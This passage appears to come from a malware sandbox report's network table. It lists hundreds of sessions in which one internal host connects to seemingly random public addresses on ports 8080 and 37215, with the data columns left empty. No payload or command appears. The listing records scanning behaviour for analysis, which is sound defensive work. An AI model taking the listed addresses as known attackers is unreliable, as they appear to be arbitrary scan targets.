                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27697192.168.2.2339360104.241.69.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27698192.168.2.2338910190.213.60.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27699192.168.2.235707867.133.232.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27700192.168.2.233357243.157.149.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27701192.168.2.2346610117.189.189.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27702192.168.2.235848678.140.188.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27703192.168.2.2360122222.129.115.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27704192.168.2.233455063.168.124.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27705192.168.2.235803247.180.73.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27706192.168.2.235616039.28.156.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27707192.168.2.233869698.150.203.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27708192.168.2.235667840.162.201.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27709192.168.2.235935671.170.17.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27710192.168.2.23502325.245.200.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27711192.168.2.2353914111.159.194.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27712192.168.2.235071842.160.30.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27713192.168.2.234195457.190.44.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27714192.168.2.23605125.116.32.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27715192.168.2.2338264122.111.160.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27716192.168.2.2348096141.15.14.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27717192.168.2.234982893.252.0.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27718192.168.2.2346270163.199.32.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27719192.168.2.2352328185.96.160.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27720192.168.2.234475814.46.150.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27721192.168.2.2347282208.195.172.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27722192.168.2.2336240117.96.240.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27723192.168.2.2340258157.126.18.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27724192.168.2.2353064169.223.40.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27725192.168.2.2344460175.188.220.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27726192.168.2.235611640.237.41.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27727192.168.2.2339226191.188.194.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27728192.168.2.234133898.38.145.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27729192.168.2.2353174126.116.50.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27730192.168.2.2333182157.252.202.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27731192.168.2.234841098.237.184.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27732192.168.2.2341768182.0.206.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27733192.168.2.235727027.8.153.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27734192.168.2.23378041.25.235.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27735192.168.2.2359342155.19.23.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27736192.168.2.2338788191.61.212.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27737192.168.2.234263418.183.105.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27738192.168.2.2352104199.126.32.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27739192.168.2.235282239.201.96.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27740192.168.2.2339350125.221.91.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27741192.168.2.234887241.59.36.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27742192.168.2.2346752157.102.162.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27743192.168.2.2343040104.25.92.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27744192.168.2.2348702157.22.77.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27745192.168.2.235078041.96.246.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27746192.168.2.234088641.249.138.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27747192.168.2.2332998197.72.57.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27748192.168.2.234333041.252.144.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27749192.168.2.2346924197.113.226.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27750192.168.2.2335974220.128.123.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27751192.168.2.2334972166.181.62.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27752192.168.2.2342030125.97.184.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27753192.168.2.2356602188.47.174.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27754192.168.2.2342492121.15.114.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27755192.168.2.2335208181.171.162.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27756192.168.2.235044699.7.236.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27757192.168.2.234698270.226.71.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27758192.168.2.2357962156.5.242.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27759192.168.2.2346794126.249.168.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27760192.168.2.235553071.49.234.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27761192.168.2.2350242144.137.65.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27762192.168.2.2346494158.63.111.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27763192.168.2.2345622118.28.207.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27764192.168.2.235405249.42.140.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27765192.168.2.2346658105.145.242.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27766192.168.2.2349642180.99.201.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27767192.168.2.235264851.62.84.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27768192.168.2.2348942119.238.47.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27769192.168.2.233278827.204.199.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27770192.168.2.235991835.45.177.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27771192.168.2.2360822150.9.54.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27772192.168.2.234506486.115.195.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27773192.168.2.234816461.135.93.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27774192.168.2.234996860.133.117.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27775192.168.2.2335158185.20.81.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27776192.168.2.2350712205.0.253.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27777192.168.2.235837023.234.142.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27778192.168.2.235548492.59.179.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27779192.168.2.2338984141.71.85.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27780192.168.2.235753644.174.160.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27781192.168.2.2341220189.224.171.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27782192.168.2.2348190208.217.97.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27783192.168.2.2347068205.234.157.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27784192.168.2.2351966128.213.109.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27785192.168.2.2351666166.156.198.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27786192.168.2.2336264209.212.228.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27787192.168.2.23426961.98.204.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27788192.168.2.2358066207.110.225.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27789192.168.2.234571893.253.184.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27790192.168.2.2360644211.56.213.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27791192.168.2.235031293.131.220.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27792192.168.2.2347372145.111.203.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27793192.168.2.2351778189.133.95.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27794192.168.2.2341226166.175.89.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27795192.168.2.233755239.130.93.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27796192.168.2.235668493.51.97.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27797192.168.2.2359398218.108.230.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27798192.168.2.2359868129.132.131.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27799192.168.2.2341766217.220.28.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27800192.168.2.2341258113.178.159.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27801192.168.2.235200817.18.81.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27802192.168.2.2338110196.59.169.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27803192.168.2.234591087.231.23.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27804192.168.2.234782850.5.255.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27805192.168.2.234952695.102.249.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27806192.168.2.234685890.44.179.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27807192.168.2.2333648170.195.211.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27808192.168.2.236001036.134.230.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27809192.168.2.235637664.115.106.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27810192.168.2.2359052191.107.44.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27811192.168.2.235200040.27.161.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27812192.168.2.2347460221.176.129.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27813192.168.2.233610259.198.18.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27814192.168.2.2355304190.141.133.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27815192.168.2.2346976179.157.227.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27816192.168.2.234980825.162.244.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27817192.168.2.2352674112.35.156.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27818192.168.2.235046682.230.189.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27819192.168.2.235724080.29.70.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27820192.168.2.2335326219.220.49.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27821192.168.2.235793263.110.158.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27822192.168.2.2355200190.196.27.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27823192.168.2.2338274217.76.44.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27824192.168.2.234066896.184.41.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27825192.168.2.234393671.243.163.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27826192.168.2.234966295.33.171.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27827192.168.2.2357220170.82.187.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27828192.168.2.2356354162.227.18.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27829192.168.2.2343050133.192.41.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27830192.168.2.2345468117.136.225.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27831192.168.2.2337246199.76.106.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27832192.168.2.2349518222.32.171.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27833192.168.2.2338344199.96.39.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27834192.168.2.235338669.17.251.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27835192.168.2.234536891.250.110.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27836192.168.2.2335862223.103.203.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27837192.168.2.235632281.97.31.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27838192.168.2.235627245.94.212.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27839192.168.2.2360714108.147.177.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27840192.168.2.2353054183.153.135.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27841192.168.2.23524709.101.159.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27842192.168.2.236001031.222.152.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27843192.168.2.2354556154.98.190.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27844192.168.2.2359598205.95.200.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27845192.168.2.233880897.159.218.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27846192.168.2.233682499.26.64.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27847192.168.2.23452008.214.190.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27848192.168.2.234661253.224.55.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27849192.168.2.2346156183.184.205.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27850192.168.2.2346896117.19.190.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27851192.168.2.2355970192.21.9.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27852192.168.2.235111873.192.107.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27853192.168.2.2337462111.196.147.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27854192.168.2.235449662.120.234.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27855192.168.2.2337136187.86.103.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27856192.168.2.2346984123.44.89.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27857192.168.2.2345678173.141.20.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27858192.168.2.235064265.93.174.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27859192.168.2.235284293.134.27.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27860192.168.2.2357320131.199.50.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27861192.168.2.233387476.193.184.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27862192.168.2.233618427.196.55.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27863192.168.2.233713488.23.97.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27864192.168.2.2338892205.171.137.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27865192.168.2.234771818.210.54.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27866192.168.2.2354002141.200.59.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27867192.168.2.2357466109.147.53.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27868192.168.2.235769045.77.136.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27869192.168.2.234422219.133.0.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27870192.168.2.2343750177.223.188.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27871192.168.2.235641887.254.45.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27872192.168.2.234445682.178.11.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27873192.168.2.2352870216.105.168.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27874192.168.2.2334512106.109.168.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27875192.168.2.2360078120.223.147.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27876192.168.2.234450852.95.178.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27877192.168.2.2335436193.72.2.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27878192.168.2.234928072.31.142.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27879192.168.2.2345780205.204.10.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27880192.168.2.234953635.213.171.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27881192.168.2.2339170148.205.161.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27882192.168.2.2344756221.36.218.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27883192.168.2.2352614106.176.39.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27884192.168.2.234129653.169.160.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27885192.168.2.2358934147.199.234.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27886192.168.2.233661425.254.152.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27887192.168.2.2347122152.28.215.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27888192.168.2.233558232.168.116.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27889192.168.2.233653878.232.26.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27890192.168.2.234429424.120.84.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27891192.168.2.2360338108.48.33.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27892192.168.2.2336736219.42.221.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27893192.168.2.234875435.233.176.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27894192.168.2.2360924197.81.51.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27895192.168.2.2342444121.109.49.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27896192.168.2.2356864178.180.190.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27897192.168.2.2359364174.202.130.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27898192.168.2.2356986176.212.200.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27899192.168.2.2356506121.208.46.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27900192.168.2.23599248.32.89.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27901192.168.2.2350874114.18.236.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27902192.168.2.2348110201.156.149.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27903192.168.2.2358720219.198.136.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27904192.168.2.2345076199.233.111.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27905192.168.2.2352140101.211.39.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27906192.168.2.2342868187.124.97.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27907192.168.2.235478817.10.249.1718080
